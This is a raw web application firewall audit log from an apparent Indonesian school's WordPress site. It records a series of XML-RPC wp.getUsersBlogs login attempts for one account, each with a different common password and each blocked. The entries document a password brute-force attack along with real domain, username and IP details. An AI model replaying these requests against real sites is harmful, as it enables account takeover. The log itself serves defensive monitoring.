OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5362115a-Z-- --da772d61-A-- [19/Apr/2025:21:17:49 +0700] aAOwjevDiFC_ir7MDwbmxQAAAFg 103.236.140.4 35610 103.236.140.4 8181 --da772d61-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --da772d61-C-- wp.getUsersBlogs wakahumas PASS --da772d61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da772d61-E-- --da772d61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072269971801 5060 (- - -) Stopwatch2: 1745072269971801 5060; combined=3617, p1=459, p2=2988, p3=0, p4=0, p5=101, sr=86, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da772d61-Z-- --a8463b07-A-- [19/Apr/2025:21:18:49 +0700] aAOwyUruoUXZj665VUH6wQAAAMM 103.236.140.4 41708 103.236.140.4 8181 --a8463b07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a8463b07-C-- wp.getUsersBlogs wakahumas playboy --a8463b07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8463b07-E-- --a8463b07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072329151305 5600 (- - -) Stopwatch2: 1745072329151305 5600; combined=3735, p1=449, p2=3082, p3=0, p4=0, p5=122, sr=78, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8463b07-Z-- --dfe49e5d-A-- [19/Apr/2025:21:19:56 +0700] aAOxDHNa4dA2HllpK_OAegAAAIw 103.236.140.4 48494 103.236.140.4 8181 --dfe49e5d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dfe49e5d-C-- wp.getUsersBlogs wakahumas london12 --dfe49e5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfe49e5d-E-- --dfe49e5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072396606736 7703 (- - -) Stopwatch2: 1745072396606736 7703; combined=5811, p1=662, p2=4922, p3=0, p4=0, p5=132, sr=117, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfe49e5d-Z-- --ecbe990c-A-- [19/Apr/2025:21:20:56 +0700] aAOxSEruoUXZj665VUH9-wAAAMg 103.236.140.4 54664 103.236.140.4 8181 --ecbe990c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ecbe990c-C-- wp.getUsersBlogs wakahumas 123qwe --ecbe990c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecbe990c-E-- --ecbe990c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072456055336 4054 (- - -) Stopwatch2: 1745072456055336 4054; combined=2791, p1=358, p2=2303, p3=0, p4=0, p5=78, sr=73, sw=52, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecbe990c-Z-- --7a5c7e0b-A-- [19/Apr/2025:21:21:56 +0700] aAOxhA6cTFSgLAHl7PrhWAAAAAM 103.236.140.4 32810 103.236.140.4 8181 --7a5c7e0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7a5c7e0b-C-- wp.getUsersBlogs wakahumas 123789 --7a5c7e0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a5c7e0b-E-- --7a5c7e0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072516214770 4159 (- - -) Stopwatch2: 1745072516214770 4159; combined=3061, p1=368, p2=2542, p3=0, p4=0, p5=90, sr=76, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a5c7e0b-Z-- --e8300f0b-A-- [19/Apr/2025:21:22:56 +0700] aAOxwHNa4dA2HllpK_OEqwAAAJM 103.236.140.4 39046 103.236.140.4 8181 --e8300f0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e8300f0b-C-- wp.getUsersBlogs wakahumas P@SSWORD --e8300f0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8300f0b-E-- --e8300f0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072576257633 4227 (- - -) Stopwatch2: 1745072576257633 4227; combined=3288, p1=386, p2=2758, p3=0, p4=0, p5=86, sr=78, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8300f0b-Z-- --22ae3d7b-A-- [19/Apr/2025:21:24:02 +0700] aAOyAkruoUXZj665VUEDGgAAAMw 103.236.140.4 45930 103.236.140.4 8181 --22ae3d7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --22ae3d7b-C-- wp.getUsersBlogs wakahumas 4444 --22ae3d7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22ae3d7b-E-- --22ae3d7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072642197079 3997 (- - -) Stopwatch2: 1745072642197079 3997; combined=2699, p1=358, p2=2174, p3=0, p4=0, p5=100, sr=79, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22ae3d7b-Z-- --3623c753-A-- [19/Apr/2025:21:25:02 +0700] aAOyPkruoUXZj665VUEEngAAANc 103.236.140.4 52176 103.236.140.4 8181 --3623c753-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3623c753-C-- wp.getUsersBlogs wakahumas 2003 --3623c753-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3623c753-E-- --3623c753-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072702289801 6027 (- - -) Stopwatch2: 1745072702289801 6027; combined=4123, p1=615, p2=3328, p3=0, p4=0, p5=106, sr=96, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3623c753-Z-- --ac967a70-A-- [19/Apr/2025:21:26:04 +0700] aAOyfEruoUXZj665VUEGFgAAAMQ 103.236.140.4 58600 103.236.140.4 8181 --ac967a70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ac967a70-C-- wp.getUsersBlogs wakahumas 123ewq --ac967a70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac967a70-E-- --ac967a70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072764548935 4797 (- - -) Stopwatch2: 1745072764548935 4797; combined=3407, p1=430, p2=2817, p3=0, p4=0, p5=94, sr=85, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac967a70-Z-- --13fe9d01-A-- [19/Apr/2025:21:27:08 +0700] aAOyvOvDiFC_ir7MDwb0PgAAAFY 103.236.140.4 36888 103.236.140.4 8181 --13fe9d01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --13fe9d01-C-- wp.getUsersBlogs wakahumas power123445 --13fe9d01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13fe9d01-E-- --13fe9d01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072828928792 5155 (- - -) Stopwatch2: 1745072828928792 5155; combined=3863, p1=476, p2=3212, p3=0, p4=0, p5=102, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13fe9d01-Z-- --1dd66152-A-- [19/Apr/2025:21:28:09 +0700] aAOy-UruoUXZj665VUEJuAAAANE 103.236.140.4 43040 103.236.140.4 8181 --1dd66152-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1dd66152-C-- wp.getUsersBlogs wakahumas zxcvb --1dd66152-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dd66152-E-- --1dd66152-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072889377846 5255 (- - -) Stopwatch2: 1745072889377846 5255; combined=3829, p1=512, p2=3140, p3=0, p4=0, p5=104, sr=93, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dd66152-Z-- --8d34a419-A-- [19/Apr/2025:21:29:12 +0700] aAOzOA6cTFSgLAHl7Prs3AAAABg 103.236.140.4 49490 103.236.140.4 8181 --8d34a419-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8d34a419-C-- wp.getUsersBlogs wakahumas rockyou --8d34a419-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d34a419-E-- --8d34a419-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072952663963 5551 (- - -) Stopwatch2: 1745072952663963 5551; combined=4102, p1=530, p2=3388, p3=0, p4=0, p5=110, sr=102, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d34a419-Z-- --39fa4e1a-A-- [19/Apr/2025:21:30:03 +0700] aAOza-vDiFC_ir7MDwb4UgAAAEU 103.236.140.4 54498 103.236.140.4 8181 --39fa4e1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --39fa4e1a-C-- wp.getUsersBlogs wakahumas 1234%^&* --39fa4e1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39fa4e1a-E-- --39fa4e1a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073003440862 5508 (- - -) Stopwatch2: 1745073003440862 5508; combined=4023, p1=414, p2=3343, p3=0, p4=0, p5=160, sr=70, sw=106, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39fa4e1a-Z-- --4ead8b32-A-- [19/Apr/2025:21:30:20 +0700] aAOzfA6cTFSgLAHl7PruwAAAABY 103.236.140.4 56206 103.236.140.4 8181 --4ead8b32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4ead8b32-C-- wp.getUsersBlogs wakahumas 123asdasd --4ead8b32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ead8b32-E-- --4ead8b32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073020183451 5068 (- - -) Stopwatch2: 1745073020183451 5068; combined=3761, p1=451, p2=3102, p3=0, p4=0, p5=122, sr=94, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ead8b32-Z-- --a07d4b60-A-- [19/Apr/2025:21:31:20 +0700] aAOzuHNa4dA2HllpK_OQ4wAAAIk 103.236.140.4 34172 103.236.140.4 8181 --a07d4b60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a07d4b60-C-- wp.getUsersBlogs wakahumas !@#123 --a07d4b60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a07d4b60-E-- --a07d4b60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745073080445510 5552 (- - -) Stopwatch2: 1745073080445510 5552; combined=4001, p1=484, p2=3346, p3=0, p4=0, p5=102, sr=91, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a07d4b60-Z-- --76d89869-A-- [19/Apr/2025:21:32:22 +0700] aAOz9g6cTFSgLAHl7PrxzwAAABI 103.236.140.4 39910 103.236.140.4 8181 --76d89869-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --76d89869-C-- wp.getUsersBlogs wakahumas justin --76d89869-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76d89869-E-- --76d89869-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity 